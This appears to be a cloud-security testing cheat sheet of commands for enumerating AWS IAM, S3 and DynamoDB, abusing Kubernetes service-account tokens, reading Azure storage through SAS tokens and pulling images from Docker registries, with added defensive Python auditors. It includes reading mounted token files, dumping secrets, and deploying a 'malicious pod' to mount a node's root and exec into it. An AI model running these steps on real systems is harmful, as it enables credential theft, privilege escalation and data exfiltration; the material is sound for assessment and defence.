aws configure
AWS Access Key ID [None]: key_id
AWS Secret Access Key [None]: access_key
Default region name [None]: eu-west-3
Default output format [None]:
Note: If you have multiple accounts, you can specify the account and the endpoint URL with --profile <profile_name> and --endpoint-url <url>.
Example:
aws --profile <profile> --endpoint-url <url> iam list-attached-user-policies --user-name <USERNAME>
aws iam list-attached-user-policies --user-name <USERNAME>
This command will return an object like this:
{
    "AttachedPolicies": [
        {
            "PolicyName": "<POLICY_NAME>",
            "PolicyArn": "arn:aws:iam::......:policy/<POLICY_NAME>"
        }
    ],
    "IsTruncated": false
}
aws iam get-policy --policy-arn <ARN_POLICY>
aws iam list-user-policies --user-name <USER_NAME>
aws iam get-user-policy --user-name <USER_NAME> --policy-name <POLICY_NAME>
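The policies enumerated above are only as safe as the statements inside them. As an added example (not part of the original page), this Python script audits an IAM policy document such as the one `aws iam get-policy-version` or `get-user-policy` returns and flags wildcards and privilege-escalation actions; the sample policy and the ESCALATION_ACTIONS list are constructed for illustration.

```python
import fnmatch

# Constructed sample of the "Document" field returned by
# `aws iam get-policy-version --policy-arn <ARN> --version-id <ID>` (or by get-user-policy).
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::app-logs/*"},
        {"Effect": "Allow", "Action": ["iam:*", "lambda:UpdateFunctionCode"], "Resource": "*"},
        {"Effect": "Deny", "Action": "*", "Resource": "*",
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "false"}}},
    ],
}

# Actions that let a principal widen its own access; a hypothetical, non-exhaustive list.
ESCALATION_ACTIONS = ("iam:AttachUserPolicy", "iam:PutUserPolicy", "iam:CreateAccessKey",
                      "iam:PassRole", "sts:AssumeRole", "lambda:UpdateFunctionCode")


def _as_list(value):
    """IAM accepts a string or a list in Statement/Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def audit_policy(document):
    """Return (severity, statement_index, message) tuples for risky Allow statements."""
    findings = []
    for i, stmt in enumerate(_as_list(document.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        if "NotAction" in stmt:
            findings.append(("high", i, "Allow with NotAction grants everything not listed"))
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        if "*" in actions:
            findings.append(("high", i, "Action '*' allows every API call"))
        elif any(a.endswith("*") for a in actions):
            findings.append(("medium", i, "service-wide wildcard action(s)"))
        if "*" in _as_list(stmt.get("Resource", [])):
            findings.append(("medium", i, "Resource '*' is not scoped to a specific resource"))
        # IAM action names are case-insensitive, so compare lower-cased with glob semantics.
        escalations = sorted(esc for esc in ESCALATION_ACTIONS
                             if any(fnmatch.fnmatchcase(esc.lower(), pat) for pat in actions))
        if escalations:
            findings.append(("high", i, "privilege-escalation actions: " + ", ".join(escalations)))
    return findings


if __name__ == "__main__":
    for severity, index, message in audit_policy(SAMPLE_POLICY):
        print(f"[{severity}] statement {index}: {message}")
```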
aws lambda list-functions
aws lambda get-function-url-config --function-name <FUNCTION_NAME>
See the aws s3 documentation and the aws s3api documentation.
aws s3api list-buckets --query "Buckets"
aws s3api list-objects --bucket <BUCKET>
aws s3 ls --recursive s3://<bucket_name>
aws s3 sync s3://<bucket_name> <destination>
aws s3 cp <path_to_file> s3://<bucket_name>
aws dynamodb list-tables
aws dynamodb scan --table-name <table_name>
aws --endpoint-url http://localhost:4566 dynamodb create-table --table-name example \
--attribute-definitions AttributeName=example_attribute,AttributeType=S \
--key-schema AttributeName=example_attribute,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
aws --endpoint-url http://localhost:4566 dynamodb put-item --table-name example \
--item '{"example_attribute":{"S":"Example"}}'
Kubernetes, commonly stylized as K8s, is an open-source container orchestration system for automating software deployment, scaling, and management. Google originally designed Kubernetes, but the Cloud Native Computing Foundation now maintains the project.
Inside a pod, the service account's CA certificate, namespace and token are mounted at the following paths (/var/run is usually a symlink to /run, so both locations refer to the same files):
/run/secrets/kubernetes.io/serviceaccount/ca.crt
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/var/run/secrets/kubernetes.io/serviceaccount/token
kubectl get namespace --server <HOST> --certificate-authority=ca.crt --token=$token
kubectl auth can-i --list --namespace=<NAMESPACES> --server <HOST> --certificate-authority=ca.crt --token=$token
List all secrets:
kubectl get secrets --namespace=<NAMESPACES> --server <HOST> --certificate-authority=ca.crt --token=$token
Get secret:
kubectl describe secret <SECRET-ID> --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token
Get:
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token get pods
Describe:
You can get configuration of specific
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token describe pod <POD_ID>
Apply:
If you have sufficient rights to apply a pod, most of the time you will be able to mount the root volume of the underlying node.
You can find a definition of a malicious pod here: pwn.yml
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token apply -f pwn.yml
kubectl --namespace=<NAMESPACE> --server <HOST> --certificate-authority=ca.crt --token=$token exec -it pwn -- bash
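To review what a mounted service account token can actually do, this added Python example (not from the original page) parses the `kubectl auth can-i --list` output shown above and flags rights a defender would not expect a workload to hold; the sample output and the RISKY rules are constructed for illustration.

```python
import re

# Constructed sample in the shape of the `kubectl auth can-i --list` output (see the command above).
SAMPLE_CAN_I = """\
Resources                                       Non-Resource URLs   Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
secrets                                         []                  []               [get list]
pods                                            []                  []               [create get list]
pods/exec                                       []                  []               [create]
                                                [/healthz]          []               [get]
"""

# Review rules a defender applies to a service account's effective rights; hypothetical, not exhaustive.
RISKY = {
    ("secrets", "get"): "can read Secrets in the namespace",
    ("secrets", "list"): "can enumerate Secrets in the namespace",
    ("pods", "create"): "can create pods (the right the apply step above depends on)",
    ("pods/exec", "create"): "can exec into running pods",
    ("*", "*"): "full access to every resource (cluster-admin-like)",
}

# Columns: resource, non-resource URLs, resource names, verbs; the resource column may be blank.
_ROW_RE = re.compile(r"^(\S*)\s+(\[[^\]]*\])\s+(\[[^\]]*\])\s+(\[[^\]]*\])\s*$")


def parse_can_i(text):
    """Return (resource, [verbs]) pairs from `kubectl auth can-i --list` output."""
    rows = []
    for line in text.splitlines()[1:]:  # the first line is the column header
        match = _ROW_RE.match(line)
        if match:
            rows.append((match.group(1), match.group(4).strip("[]").split()))
    return rows


def review_rights(text):
    """Return one finding per (resource, verb) pair that matches a RISKY rule."""
    findings = []
    for resource, verbs in parse_can_i(text):
        for verb in verbs:
            for (rule_resource, rule_verb), why in RISKY.items():
                # A wildcard in the token's own rights covers every rule, not the other way round.
                if resource in (rule_resource, "*") and verb in (rule_verb, "*"):
                    findings.append(f"{resource} {verb}: {why}")
    return findings


if __name__ == "__main__":
    for finding in review_rights(SAMPLE_CAN_I):
        print(finding)
```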
curl "http://<account>.blob.core.windows.net/<container>?restype=container&comp=list&se=<SE>&sp=<SP>&sv=<SV>&sr=c&sig=<SIG>%3D"
curl "http://<account>.blob.core.windows.net/<container>/<file_name>?se=<SE>&sp=rl&sv=<SV>&sr=c&sig=<SIG>%3D"
Note: %3D is the URL-encoded '=' and it is required.
You can find more information on the query parameters here.
# script.py
from azure.cosmosdb.table import TableService
# Authenticate to the Table service with the SAS query string (without the leading '?');
# protocol='http' matches the plain-http URLs used above.
table_service = TableService(account_name="...", sas_token='se=<SE>&sp=<SP>&sv=<SV>&tn=<Table>&sig=<SIG>%3D', protocol='http', endpoint_suffix='core.windows.net')
print(table_service.exists('<TABLE>'))  # True if the table exists and the SAS grants access to it
print(list(table_service.query_entities('<TABLE>')))  # every entity the SAS allows us to read
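Added example, not part of the original page: this Python function decodes a SAS query string like the ones in the curl commands and the script above and reports what it grants (permissions, expiry, protocol and IP restrictions), which is what a defender checks when such a token turns up in a config or a log; the sample SAS values are constructed and the signature is a placeholder.

```python
from datetime import datetime, timezone
from urllib.parse import parse_qs

# Meaning of the letters in the `sp` (signed permissions) parameter of a blob/container SAS.
PERMISSIONS = {"r": "read", "a": "add", "c": "create", "w": "write", "d": "delete", "l": "list"}
WRITE_LIKE = set("acwd")  # any of these means the token can alter data

# Constructed sample in the shape used by the requests above; `sig` is a placeholder.
SAMPLE_SAS = "se=2030-12-31T23%3A59%3A59Z&sp=rwdl&sv=2021-06-08&sr=c&sig=PLACEHOLDER%3D"


def inspect_sas(sas, now=None):
    """Decode a SAS query string and return its scope, permissions, expiry and review findings."""
    now = now or datetime.now(timezone.utc)
    # parse_qs URL-decodes the values, so the %3D padding of `sig` becomes a literal '='.
    params = {k: v[0] for k, v in parse_qs(sas.lstrip("?")).items()}
    findings = []
    perms = [PERMISSIONS.get(ch, ch) for ch in params.get("sp", "")]
    if WRITE_LIKE & set(params.get("sp", "")):
        findings.append("token permits modification: " + ", ".join(perms))
    days_left = None
    if "se" not in params:
        findings.append("no expiry (se) present")
    else:
        expiry = datetime.fromisoformat(params["se"].replace("Z", "+00:00"))
        if expiry.tzinfo is None:  # date-only form such as 2030-12-31
            expiry = expiry.replace(tzinfo=timezone.utc)
        days_left = (expiry - now).days
        if days_left < 0:
            findings.append("token has expired")
        elif days_left > 30:
            findings.append(f"long-lived token: {days_left} days until expiry")
    # spr defaults to "https,http", which is why the plain-http requests above are accepted.
    if "http" in params.get("spr", "https,http").split(","):
        findings.append("plaintext HTTP allowed (spr not restricted to https)")
    if "sip" not in params:
        findings.append("no source IP restriction (sip)")
    # Blob/container SAS carries the resource type in `sr`; a table SAS names the table in `tn`.
    scope = "table " + params["tn"] if "tn" in params else params.get("sr", "unknown")
    return {"scope": scope, "permissions": perms, "days_left": days_left,
            "sig": params.get("sig"), "findings": findings}


if __name__ == "__main__":
    for key, value in inspect_sas(SAMPLE_SAS).items():
        print(f"{key}: {value}")
```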
By default, the Docker registry runs on port 5000. The first step is to find out whether the registry requires an authentication token or not. You can do this by sending a request to the registry.
curl -I http://<HOST>:5000/v2/
The Www-Authenticate response header tells you whether the registry requires an authentication token or not.
Example of response:
Www-Authenticate: Bearer realm="http://<HOST>:5001/",service="Docker registry",error="invalid_token"
From this response you can try to get a token; the realm is the URL of the token endpoint.
Examples of requests:
# The URLs are quoted so that the shell does not treat '&' as a background operator or expand '*'.
# Try to get access only to the catalog
curl "http://<REALM_URL>/auth?scope=registry:catalog:*&service=<NAME_OF_SERVICE>"
# Try to get pull and push rights on an image
curl "http://<REALM_URL>/auth?scope=repository:<IMAGE_NAME>:*&service=<NAME_OF_SERVICE>"
# Try to get only the pull right on an image
curl "http://<REALM_URL>/auth?scope=repository:<IMAGE_NAME>:pull&service=<NAME_OF_SERVICE>"
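Added example, not from the original page: this Python code parses the Www-Authenticate challenge shown above, builds the token request URL with proper encoding (the unquoted `&`, `:` and `*` in hand-typed curl lines are a common source of errors), and classifies a registry as anonymous, Bearer or Basic from its /v2/ response, which is the check a defender runs to catch a registry exposed without authentication; the challenge value is constructed with a placeholder host.

```python
import re
from urllib.parse import urlencode

# Constructed sample of the challenge returned on GET /v2/; the host is a placeholder.
SAMPLE_CHALLENGE = ('Bearer realm="http://registry.example:5001/auth",'
                    'service="Docker registry",error="invalid_token"')

# key="quoted value" or key=bare-value, comma separated
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]*))')


def parse_challenge(header):
    """Split a Www-Authenticate value into (scheme, {param: value})."""
    scheme, _, rest = header.strip().partition(" ")
    params = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
              for m in _PARAM_RE.finditer(rest)}
    return scheme, params


def token_request_url(header, scope):
    """Build the token-endpoint URL for `scope`; urlencode escapes ':' and '*' so the
    shell and the token server both see a single, well-formed request."""
    scheme, params = parse_challenge(header)
    if scheme.lower() != "bearer" or "realm" not in params:
        raise ValueError("not a Bearer token challenge")
    query = urlencode({"service": params.get("service", ""), "scope": scope})
    return f'{params["realm"]}?{query}'


def classify_registry(status, headers):
    """Classify a registry's auth posture from the status and headers of GET /v2/."""
    lowered = {k.lower(): v for k, v in headers.items()}
    challenge = lowered.get("www-authenticate")
    if status == 200 and not challenge:
        return "anonymous"  # no authentication at all: anyone can list and pull images
    if status == 401 and challenge:
        return parse_challenge(challenge)[0].lower()  # "bearer" or "basic"
    return "unknown"


if __name__ == "__main__":
    print(classify_registry(401, {"Www-Authenticate": SAMPLE_CHALLENGE}))
    print(token_request_url(SAMPLE_CHALLENGE, "registry:catalog:*"))
```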
You can get all image names by sending a request to the registry with the authentication token.
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/_catalog
You can get all tags for an image by sending a request to the registry with the authentication token.
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/tags/list
You can get the image manifest, and then each layer blob it references, by sending requests to the registry with the authentication token.
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/manifests/<TAG>
curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/blobs/<LAYER>
You can also use an automated tool like DockerRegistryGrabber.